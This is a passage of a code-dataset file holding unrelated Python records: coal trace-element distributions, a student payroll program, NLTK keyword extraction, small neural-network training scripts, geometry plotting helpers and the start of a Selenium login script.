qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br = qe_Br_All\n pe_Br = pe_Br_All\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8680 #Btu/kWh\n FGD_water_treatment = 2.36e-4 #m^3/kWh\n\n # For Illinois #6 Coal\n elif coal == 'Illinois #6':\n COALQUAL = COALQUAL[(COALQUAL['Bed'] == 'HERRIN NO 6')]\n qe_Cl = qe_Cl_All\n pe_Cl = pe_Cl_All\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br, pe_Br = ecdf(COALQUAL['Bromine'])\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = (8279+8319)/2 #Btu/kWh\n FGD_water_treatment = 2.22e-4 #m^3/kWh\n\n # For ND Lignite Coal\n elif coal == 'ND Lignite':\n COALQUAL = COALQUAL[(COALQUAL['State'] == 'North Dakota') & (COALQUAL['Rank'] == 'LIGNITE')]\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br = qe_Br_All\n pe_Br = pe_Br_All\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8865 #Btu/kWh\n FGD_water_treatment = 2.39e-4 #m^3/kWh\n\n # For Pocahontas #3 Seam Coal\n elif coal == \"Pocahontas #3\":\n COALQUAL = COALQUAL[(COALQUAL['Bed'] == 'POCAHONTAS NO 3')]\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br, pe_Br = ecdf(COALQUAL['Bromine'])\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8099 #Btu/kWh\n FGD_water_treatment = 2.19e-4 #m^3/kWh\n\n # For Upper Freeport Coal\n elif coal == 'Upper Freeport':\n COALQUAL = COALQUAL[(COALQUAL['Bed'] == 'UPPER FREEPORT')]\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br, pe_Br = ecdf(COALQUAL['Bromine'])\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8104 #Btu/kWh\n FGD_water_treatment = 2.11e-4 #m^3/kWh\n\n # For WPC Utah Coal\n elif coal == 'WPC Utah':\n COALQUAL = COALQUAL[(COALQUAL['Region'] == 'SOUTHWESTERN UTAH')]\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br = qe_Br_All\n pe_Br = pe_Br_All\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8347 #Btu/kWh\n FGD_water_treatment = 2.42e-4 #m^3/kWh\n\n # For Wyodak Coal\n elif coal == 'Wyodak':\n COALQUAL = COALQUAL[(COALQUAL['Bed'] == 'WYODAK')]\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br = qe_Br_All\n pe_Br = pe_Br_All\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8192 #Btu/kWh\n 
FGD_water_treatment = 1.66e-4 #m^3/kWh\n\n # For Wyodak-Anderson Coal\n elif coal == 'Wyodak Anderson':\n COALQUAL = COALQUAL[(COALQUAL['Bed'] == 'WYODAK-ANDERSON')]\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br, pe_Br = ecdf(COALQUAL['Bromine'])\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8585 #Btu/kWh\n FGD_water_treatment = 2.32e-4 #m^3/kWh\n\n # For Wyoming PRB Coal\n elif coal == 'Wyoming PRB':\n COALQUAL = COALQUAL[(COALQUAL['Region'] == 'POWDER RIVER') & (COALQUAL['State'] == 'Wyoming')]\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br, pe_Br = ecdf(COALQUAL['Bromine'])\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8588 #Btu/kWh\n FGD_water_treatment = 2.28e-4 #m^3/kWh\n\n return qe_Cl, pe_Cl, qe_Se, pe_Se, qe_B, pe_B, qe_Br, pe_Br, qe_Pb, pe_Pb, qe_As, pe_As, qe_Hg, pe_Hg, qe_Heat, \\\n pe_Heat, gross_heat_rate, FGD_water_treatment\n","sub_path":"Code/user_specified_trace_element_partitioning/coal_ecdf.py","file_name":"coal_ecdf.py","file_ext":"py","file_size_in_byte":9239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"157450398","text":"#Scott Floam\n#3/28/2015\n\n#Payroll Program\n\n\ndef main():\n print(\"Payroll Program\")\n print(\"---------------------------------------------------------\")\n\n \n #Gathers the lists from a separate function\n #-------------------------------------------------\n \n employeeWages, employeeHours, employeePayRate, employeeID = lists()\n\n \n \n #Counts the number of items in each list\n #-------------------------------------------------------\n \n employeeID_counter = len(employeeID)\n \n employeePayRate_counter = len(employeePayRate)\n\n employeeHours_counter = len(employeeHours)\n\n employeeWages_counter = len(employeeWages)\n\n\n # Allows users to see a complete list of all IDs and payments \n #-------------------------------------------------------------\n \n if employeeID_counter == employeePayRate_counter and employeePayRate_counter == employeeHours_counter and employeeHours_counter == employeeWages_counter:\n\n index_range = employeePayRate_counter\n\n print()\n\n print (\"Employee ID\",'\\t', \"Hours\",'\\t\\t',\"Pay Rate\",'\\t',\"Employee Wages\")\n\n for i in range(index_range):\n\n print(employeeID[i],'\\t\\t',employeeHours[i],'\\t\\t',\"$\"+format(float(employeePayRate[i]),',.2f'),'\\t', \"$\"+format(employeeWages[i],',.2f'))\n\n print()\n\n else:\n\n print(\"These lists will not work for this program\")\n \n print()\n\n continuous_prompt = \"Y\"\n \n while continuous_prompt != \"N\" and continuous_prompt != \"n\":\n \n get_id = int(input(\"Enter an Employee ID to see his/her gross wages: \"))\n\n wage_lists(i,employeeWages)\n \n get_wages(get_id,employeeWages)\n\n print()\n \n continuous_prompt = input(\"Would you like to search another employee's gross wages again? Press enter to search again. Enter 'n' or 'N' to exit: \")\n\n print()\n \n print(\"You have opted to exit the program. 
Goodbye!\")\n# Allows users to Search by individual ID #\n#-------------------------------------------\n\n\ndef get_wages(get_id,employeeWages):\n\n    while get_id != 56588 and get_id != 45201 and get_id != 78951 and get_id != 87775 and get_id != 84512 and get_id != 13028 and get_id != 75804:\n        print()\n        print (\"You entered an invalid Employee ID number. Try again!\")\n        print()\n        get_id = int(input(\"Enter an Employee ID to see his/her wage: \"))\n\n\n    if get_id == 56588:\n        i = 0 \n        employee_wage = wage_lists(i,employeeWages)\n        print()\n        print(\"Employee ID:\",get_id,'\\t\\t',\"Employee's Gross Wages:\",\"$\"+format(float(employee_wage),',.2f'))\n\n\n    elif get_id == 45201:\n        i = 1\n        employee_wage = wage_lists(i,employeeWages)\n        print()\n        print(\"Employee ID:\",get_id,'\\t\\t',\"Employee's Gross Wages:\",\"$\"+format(float(employee_wage),',.2f')) \n\n\n    elif get_id == 78951:\n        i = 2\n        employee_wage = wage_lists(i,employeeWages)\n        print()\n        print(\"Employee ID:\",get_id,'\\t\\t',\"Employee's Gross Wages:\",\"$\"+format(float(employee_wage),',.2f'))\n\n    \n    elif get_id == 87775:\n        i = 3\n        employee_wage = wage_lists(i,employeeWages)\n        print()\n        print(\"Employee ID:\",get_id,'\\t\\t',\"Employee's Gross Wages:\",\"$\"+format(float(employee_wage),',.2f'))\n\n    \n    elif get_id == 84512:\n        i = 4\n        employee_wage = wage_lists(i,employeeWages)\n        print()\n        print(\"Employee ID:\",get_id,'\\t\\t',\"Employee's Gross Wages:\",\"$\"+format(float(employee_wage),',.2f'))\n\n    \n    elif get_id == 13028:\n        i = 5\n        employee_wage = wage_lists(i,employeeWages)\n        print()\n        print(\"Employee ID:\",get_id,'\\t\\t',\"Employee's Gross Wages:\",\"$\"+format(float(employee_wage),',.2f'))\n\n    \n    elif get_id == 75804:\n        i = 6\n        employee_wage = wage_lists(i,employeeWages)\n        print()\n        print(\"Employee ID:\",get_id,'\\t\\t',\"Employee's Gross Wages:\",\"$\"+format(float(employee_wage),',.2f'))\n\n    \n    else:\n        print()\n        print(\"You entered an invalid Employee ID number\")\n    \n    \n#Function to hold each list \n#-------------------------------------------------\n    \n\ndef lists():\n\n    employeeID = [56588,45201,78951,87775,84512,13028,75804]\n\n    employeePayRate = [13.60,13.50,13.40,13.30,13.20,13.10,13.00]\n\n    employeeHours = [40,41,42,43,44,45,46]\n\n    employeeWages = [544.00,553.50,562.80,571.90,580.80,589.50,598.00]\n\n    return employeeWages,employeeHours,employeePayRate,employeeID\n\n\n#Function to pull only the wages from the wage list in the list() function\n#-------------------------------------------------------------------------\n\ndef wage_lists(i,employeeWages):\n\n    payAmount = employeeWages\n\n    return payAmount[i]\n\n\nmain()\n","sub_path":"Program 13/Floam_Prog 13_Payroll Program.py","file_name":"Floam_Prog 13_Payroll Program.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
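get_wages above spells out one elif branch per employee ID. A compact sketch of the same lookup driven by the parallel lists returned by lists(), using list.index; behaviour (re-prompt on bad IDs, same print format) is preserved, and the function name is hypothetical:

def get_wages_compact(get_id, employeeID, employeeWages):
    # Re-prompt until the entered ID exists in the ID list.
    while get_id not in employeeID:
        print("\nYou entered an invalid Employee ID number. Try again!\n")
        get_id = int(input("Enter an Employee ID to see his/her wage: "))
    # The wage sits at the same index as the ID in the parallel list.
    wage = employeeWages[employeeID.index(get_id)]
    print("Employee ID:", get_id, '\t\t',
          "Employee's Gross Wages:", "$" + format(float(wage), ',.2f'))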
+{"seq_id":"353692353","text":"from nltk import pos_tag\nimport nltk\nfrom nltk import RegexpParser\nimport collections\nfrom nltk.stem.porter import *\n\nstemmer = PorterStemmer()\n\ndef clean_text(text):\n    text = text.replace('next page', '')\n    text = text.replace('(', '')\n    text = text.replace(')', '')\n    text = text.replace('“', '')\n    text = text.replace('”', '')\n    text = text.replace('/n', ' ')\n    text = text.replace('.', ' ')\n    text = text.replace(',', ' ')\n    text = text.lower()\n    return text\n\ndef get_noun_counter(text) -> collections.Counter: \n\n    text = text.split()\n    tokens_tag = pos_tag(text)\n    patterns= \"\"\"mychunk:{<JJ.?>*<NN.?.?>*}\"\"\"\n    chunker = RegexpParser(patterns)\n    output = chunker.parse(tokens_tag)\n\n    noun_list = []\n    compound_noun_list = []\n    for n in output:\n        if isinstance(n, nltk.tree.Tree):\n            n = str(n)\n            part_of_speech = [el.split('/')[1]for el in n.split()[1:]]\n            if any([el.find('NN')>-1 for el in part_of_speech]):\n                noun = [\n                    stemmer.stem(el.split('/')[0])\n                    if el.split('/')[1] == 'NNS' or el.split('/')[1] == 'NNPS' \n                    else el.split('/')[0] \n                    for el in n.split()[1:]\n                ]\n                compound_noun_list.append(''.join([ f'{n} ' for n in noun ])[:-1])\n                noun_list.extend(noun)\n\n    noun_list = [ noun for noun in noun_list if len(noun) > 1]\n\n    return collections.Counter(noun_list), compound_noun_list\n\ndef is_target_noun(compound_noun, common_word):\n\n    return(\n        any([ len(noun) <= len(common_word) + 2 and noun.find(common_word)>-1 for noun in compound_noun.split() ])\n        or\n        any([ len(noun) <= len(common_word) + 2 and noun.find(common_word)>-1 for noun in compound_noun.split('-') ])\n    )\n\ndef _get_keyword_list(common_word_list, compound_noun_list):\n\n    compound_word_dict = {}\n    for common_word in common_word_list:\n        compound_word_dict[common_word] = []\n        for compound_noun in compound_noun_list:\n            if is_target_noun(compound_noun, common_word):\n                compound_word_dict[common_word].append(compound_noun)\n    return compound_word_dict\n\ndef print_keyword_list(keyword_list):\n\n    for common_word, compound_noun_list in keyword_list.items():\n        print(common_word)\n        for compound_noun in compound_noun_list:\n            print(compound_noun)\n        print()\n\ndef get_keyword_list(raw_text):\n    text = clean_text(raw_text)\n    noun_counter, compound_noun_list = get_noun_counter(text)\n    common_word_list = [\n        common_word[0] for common_word in noun_counter.most_common(100)\n    ]\n    keyword_list = _get_keyword_list(common_word_list, compound_noun_list)\n    return keyword_list\n\ndef main():\n\n    with open('each_public_comment/COM 70 #2021.txt') as r:\n        keyword_list = get_keyword_list(r.read())\n    print_keyword_list(keyword_list)\n    \n\nif __name__ == '__main__':\n    main()\n\n\n    ","sub_path":"public_comment_analyzer/public_comment_analyzer/get_keyword_list.py","file_name":"get_keyword_list.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"578627874","text":"nums = [1,2,3]\nn2= [9,9]\nn3= [8,9,9,9]\n\n\ns =[str(n) for n in n2]\nprint(list(str(int(''.join(s))+1)))\n\ndef plusOne(nums):\n    final = []\n    carry = 0\n    total = 0\n    \n    for i in range(len(nums)-1,-1,-1):\n        print(i)\n        total = nums[i] + carry\n        if i == len(nums)-1:\n            total +=1\n        \n        if total == 10:\n            carry = 1\n            final.append(0)\n        else:\n            carry =0\n            final.append(total)\n        \n    if carry != 0:\n        final.append(carry)\n    \n    print(final[::-1])\n    \nprint(plusOne(n3))","sub_path":"leetcode/arrays_and_string/practice/plusOne.py","file_name":"plusOne.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"349349433","text":"#!/usr/bin/python\nfrom PIL import Image\nfrom PIL import ImageOps\nimport xlwt,sys\n\nx = 150\ny = 150\n\nim = Image.open(\"C:/Users/DELL/homework/py.jpg\") # load image\nim.resize((x,y)).save('resize.jpg')\n\nim = Image.open('resize.jpg') # reload the resized copy\noutput = ImageOps.grayscale(im) # convert to grayscale\noutput.save('resize.jpg')\nim = Image.open('resize.jpg') # work on the resized grayscale image so getpixel returns a single intensity\n\nf = open(\"image.txt\", \"w\") # open text file\n\nfor pixelx in range(0,x-1):\n    f.write('\\n')\n    for pixely in 
range(0,y-1):\n color = im.getpixel((pixely,pixelx))\n if color <= 255 and color >= 253:ch = \" \"\n elif color <= 253 and color >= 250:ch = \".\"\n elif color <= 250 and color >= 230:ch = \",\"\n elif color <= 230 and color >= 210:ch = '\"'\n elif color <= 210 and color >= 190:ch = '^'\n elif color <= 190 and color >= 170:ch = \"%\"\n elif color <= 170 and color >= 150:ch = \"&\"\n elif color <= 150 and color >= 130:ch = \"a\"\n elif color <= 130 and color >= 110:ch = \"o\"\n elif color <= 110 and color >= 90:ch = \"0\"\n elif color <= 90 and color >= 70:ch = 'L'\n elif color <= 70 and color >= 50:ch = 'y'\n elif color <= 50 and color >= 30:ch = \"Y\"\n elif color <= 30 and color >= 10:ch = \"H\"\n elif color < 10 and color >= 0:ch = \"#\"\n else:ch = \" \"\n f.write(ch)\n","sub_path":"lab_4.py","file_name":"lab_4.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"346611281","text":"#!/usr/bin/env python\n \n##\n## See COPYING file distributed along with the ncanda-data-integration package\n## for the copyright and license terms\n##\n\nimport pandas\n\nimport Rwrapper\n\n#\n# Variables from surveys needed for CTQ\n#\n\n# LimeSurvey field names\nlime_fields = [ \"ctq_set1 [ctq1]\", \"ctq_set1 [ctq2]\", \"ctq_set1 [ctq3]\", \"ctq_set1 [ctq4]\", \"ctq_set1 [ctq5]\", \"ctq_set1 [ctq6]\", \"ctq_set1 [ctq7]\", \"ctq_set2 [ctq8]\", \"ctq_set2 [ctq9]\", \"ctq_set2 [ct10]\", \"ctq_set2 [ct11]\",\n \"ctq_set2 [ct12]\", \"ctq_set2 [ct13]\", \"ctq_set2 [ct14]\", \"ctq_set3 [ctq15]\", \"ctq_set3 [ctq16]\", \"ctq_set3 [ctq17]\", \"ctq_set3 [ctq18]\", \"ctq_set3 [ctq19]\", \"ctq_set3 [ctq20]\", \"ctq_set3 [ctq21]\",\n \"ctq_set4 [ctq22]\", \"ctq_set4 [ctq23]\", \"ctq_set4 [ctq24]\", \"ctq_set4 [ctq25]\", \"ctq_set4 [ctq26]\", \"ctq_set4 [ctq27]\", \"ctq_set4 [ctq28]\" ]\n\n# Dictionary to recover LimeSurvey field names from REDCap names\nrc2lime = dict()\nfor field in lime_fields:\n rc2lime[Rwrapper.label_to_sri( 'youthreport2', field )] = field\n\n# REDCap fields names\ninput_fields = { 'mrireport' : [ 'youth_report_2_complete', 'youthreport2_missing' ] + rc2lime.keys() }\n\n#\n# This determines the name of the form in REDCap where the results are posted.\n#\noutput_form = 'clinical'\n\n#\n# CTQ field names mapping from R to REDCap\n#\nR2rc = { 'Emotional Abuse Scale Total Score' : 'ctq_ea', \n 'Physical Abuse Scale Total Score' : 'ctq_pa', \n 'Sexual Abuse Scale Total Score' : 'ctq_sa', \n 'Emotional Neglect Scale Total Score' : 'ctq_en', \n 'Physical Neglect Scale Total Score' : 'ctq_pn', \n 'Minimization/Denial Scale Total Score' : 'ctq_minds' }\n\n#\n# Scoring function - take requested data (as requested by \"input_fields\") for each (subject,event), and demographics (date of birth, gender) for each subject.\n#\ndef compute_scores( data, demographics ):\n # Get rid of all records that don't have YR2\n data.dropna( axis=1, subset=['youth_report_2_complete'] )\n data = data[ data['youth_report_2_complete'] > 0 ]\n data = data[ ~(data['youthreport2_missing'] > 0) ]\n\n # If no records to score, return empty DF\n if len( data ) == 0:\n return pandas.DataFrame()\n\n # Replace all column labels with the original LimeSurvey names\n data.columns = Rwrapper.map_labels( data.columns, rc2lime )\n\n # Call the scoring function for all table rows\n scores = data.apply( Rwrapper.runscript, axis=1, Rscript='ctq/CTQ.R', scores_key='CTQ.ary' )\n\n # Replace all score columns with REDCap field names\n scores.columns = 
Rwrapper.map_labels( scores.columns, R2rc )\n\n # Simply copy completion status from the input surveys\n scores['ctq_complete'] = data['youth_report_2_complete'].map( int )\n\n # Make a proper multi-index for the scores table\n scores.index = pandas.MultiIndex.from_tuples(scores.index)\n scores.index.names = ['study_id', 'redcap_event_name']\n\n # Return the computed scores - this is what will be imported back into REDCap\n outfield_list = [ 'ctq_complete' ] + R2rc.values()\n return scores[ outfield_list ]\n\n","sub_path":"scripts/redcap/scoring/ctq/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"111825958","text":"import numpy as np\nfrom tensorflow import keras\n\nxdata = \"features12.npy\"\nydata = \"labels12.npy\"\nnumLoops = 250\n\nX = np.load(xdata)\ny = np.load(ydata)\nX = X / 255.0\n\nmodel = keras.Sequential([\n keras.layers.Flatten(input_shape=(50, 50)),\n\n keras.layers.Dense(128, activation=\"softplus\"),\n keras.layers.Dense(64, activation=\"softplus\"),\n\n keras.layers.Dense(10, activation=\"softmax\"),\n])\n\nmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\nmodel.fit(X, y, epochs=numLoops)\n","sub_path":"ControlModel.py","file_name":"ControlModel.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"449167180","text":"import os, sys\r\nsys.path.append(os.pardir)\r\nfrom common.MultiLayerNet import MultiLayerNet\r\nfrom dataset.mnist import load_mnist\r\nfrom common.optimizer import SGD\r\nimport numpy as np\r\n\r\n\r\n\r\n(x_train, t_train), (x_test, t_test) = load_mnist(normalize= True, one_hot_label = True)\r\noptimizer = SGD()\r\n\r\nnetwork = MultiLayerNet(784, [100, 100, 100, 100], 10)\r\n\r\n\r\niter_nums = 10000\r\ntrain_size = x_train.shape[0]\r\nbatch_size = 100\r\n\r\ntrain_acc_list = []\r\ntest_acc_list = []\r\n\r\niter_per_epoch = max(train_size / batch_size, 1)\r\n\r\nfor i in range(iter_nums):\r\n batch_mask = np.random.choice(train_size, batch_size)\r\n x_batch = x_train[batch_mask]\r\n t_batch = t_train[batch_mask]\r\n\r\n\r\n grads = network.gradient(x_batch, t_batch)\r\n optimizer.update(network.params, grads)\r\n\r\n if i % iter_per_epoch == 0:\r\n #train_acc = network.accuracy(x_train, t_train)\r\n #test_acc = network.accuracy(x_test, t_test)\r\n loss = network.loss(x_train, t_train)\r\n #train_acc_list.append(train_acc)\r\n #test_acc_list.append(test_acc)\r\n print(loss)\r\n\r\n","sub_path":"fully_connect/TwoLayerNet/train_neuralnetwork.py","file_name":"train_neuralnetwork.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"196667411","text":"import bisect\n\n\ndef bisect_tutorial():\n fruits = [\"apple\", \"banana\", \"banana\", \"banana\", \"orange\", \"pineapple\"]\n print(bisect.bisect(fruits, \"banana\"))\n print(bisect.bisect_left(fruits, \"banana\"))\n occurrences = bisect.bisect(fruits, \"banana\") - bisect.bisect_left(fruits, \"banana\")\n print(occurrences) # Number of occurrences of the word banana\n\n bisect.insort_left(fruits, \"kiwi\")\n print(fruits)\n\n\ndef binary_iterative(elements, search_item):\n \"\"\"Return the index of the search_item element.\"\"\"\n\n left, right = 0, len(elements) - 1\n\n while left <= right:\n\n middle_idx = (left + right) // 2\n 
middle_element = elements[middle_idx]\n\n if middle_element == search_item:\n return middle_idx\n if middle_element < search_item:\n left = middle_idx + 1\n elif middle_element > search_item:\n right = middle_idx - 1\n\n return None\n\n\nif __name__ == '__main__':\n elements = [3, 4, 5, 5, 9]\n a = binary_iterative(elements, 5)\n print(a)\n","sub_path":"PythonInterview/binarySearch.py","file_name":"binarySearch.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"371166860","text":"import numpy as np\nimport olim\nimport pyvista as pv\n\n# normalized = lambda p: p/np.linalg.norm(p)\n# angle = lambda i, i0, i1: normalized(points[i0] - points[i])@normalized(points[i1] - points[i])\n\ndef print_stencil_builder_state(bld):\n print(f'lines = {bld.current_lines()}')\n print(f'edges = {bld.stencil().tris}')\n print(f'tetras = {bld.current_tetras()}')\n \ndef get_lines_tris_and_tetras(obj):\n if isinstance(obj, olim.Stencil):\n lines = np.array(obj.lines)\n tris = np.array([(tri.i0, tri.i1) for tri in obj.tris])\n tetras = np.array([(tetra.i0, tetra.i1, tetra.i2) for tetra in obj.tetras])\n else:\n assert isinstance(obj, olim.StencilBuilder)\n lines = np.array(list(obj.current_lines()))\n tris = np.array([(tri.i0, tri.i1) for tri in obj.stencil().tris])\n tetras = np.array([(tetra.i0, tetra.i1, tetra.i2) for tetra in obj.current_tetras()])\n return lines, tris, tetras\n\ndef get_angles(bld):\n return [\n ((tri.i0, tri.i1), angle(i, tri.i0, tri.i1))\n for tri in bld.stencil().tris\n ]\n\ndef get_most_obtuse_tri_update(bld):\n return get_angles(bld)[0][0]\n\ndef print_angles(bld, i):\n print(f'angles for stencil at i = {i}')\n for tri in bld.stencil().tris:\n print(f'- i0 = {tri.i0}, i1 = {tri.i1}, angle = {angle(i, tri.i0, tri.i1)}')\n\ndef plot_update(obj, on_boundary_func, points, i, base_radius=0.01, window_size=(512, 512), background_plotter=False):\n normalized = lambda p: p/np.linalg.norm(p)\n angle = lambda i, i0, i1: normalized(points[i0] - points[i])@normalized(points[i1] - points[i])\n lines, tris, tetras = get_lines_tris_and_tetras(obj)\n if background_plotter:\n plt = pv.BackgroundPlotter()\n else:\n plt = pv.Plotter(window_size=window_size)\n p_i = points[i]\n plt.add_mesh(pv.Sphere(base_radius, p_i), color='blue')\n for i0 in lines:\n p_i0 = points[i0]\n if on_boundary_func(i) and on_boundary_func(i0):\n color = 'orange'\n else:\n color = 'white'\n plt.add_mesh(pv.Sphere(0.666*base_radius, p_i0), color=color)\n direction = p_i0 - p_i\n height = np.linalg.norm(direction)\n direction /= height\n plt.add_mesh(pv.Cylinder((p_i + p_i0)/2, direction, base_radius/5, height), color=color)\n for i0, i1 in tris:\n noncausal = angle(i, i0, i1) < 0\n p_i0, p_i1 = points[i0], points[i1]\n direction = p_i1 - p_i0\n height = np.linalg.norm(direction)\n direction /= height\n if noncausal:\n color = 'red'\n elif on_boundary_func(i) and on_boundary_func(i0) and on_boundary_func(i1):\n color = 'orange'\n else:\n color = 'white'\n plt.add_mesh(pv.Cylinder((p_i0 + p_i1)/2, direction, base_radius/5, height), color=color)\n plt.add_mesh(\n pv.PolyData(\n points,\n np.concatenate(\n [\n 3*np.ones((tetras.shape[0], 1), tetras.dtype),\n tetras\n ],\n axis=1\n ),\n ),\n color='purple',\n opacity=0.5\n )\n if not background_plotter:\n plt.show()\n\ndef get_new_point_to_insert(points, i, i0, i1):\n p0 = points[i0] - points[i]\n p1 = points[i1] - points[i]\n n = normalized((p0 + p1)/2)\n return points[i] + h*n\n\ndef 
find_containing_tetra(points, tetra, pnew):\n    def in_tetra(T):\n        q = pnew - points[T][0]\n        lam = np.linalg.solve((points[T][1:] - points[T][0]).T, q)\n        return np.all(lam > 0) and lam.sum() < 1\n    tets = np.where(np.apply_along_axis(in_tetra, 1, tetra))[0]\n    if len(tets) == 0:\n        raise Exception(\"didn't find any containing tetrahedra!\")\n    elif len(tets) > 1:\n        raise Exception(\"found multiple containing tetrahedra?!\")\n    else:\n        return tets[0]\n\ndef insert_new_point(points, tetra, pnew):\n    tet_ind = find_containing_tetra(points, tetra, pnew)\n    j = points.shape[0]\n    j0, j1, j2, j3 = tetra[tet_ind]\n    new_tetra = np.array([\n        [j, j0, j1, j2],\n        [j3, j, j0, j1],\n        [j2, j3, j, j0],\n        [j1, j2, j3, j]\n    ], dtype=tetra.dtype)\n    points = np.concatenate([points, [pnew]], axis=0)\n    tetra = np.concatenate([\n        np.delete(tetra, tet_ind, axis=0),\n        new_tetra\n    ], axis=0)\n    return points, tetra","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"153953452","text":"# -*- coding: utf-8 -*-\n# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py:light\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.11.4\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# +\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\n\n\noptions = webdriver.ChromeOptions()\n# options.add_argument('headless') # uncomment to run Chrome in headless mode\noptions.add_argument('window-size=1920x1080')\noptions.add_argument(\"disable-gpu\")\ndriver = webdriver.Chrome('chromedriver', options=options)\ndriver.implicitly_wait(5)\n\nprint(\"Login Start\")\ndriver.get('https://nid.naver.com/nidlogin.login')\ntag_id = driver.find_element_by_name('id')\ntag_pw = 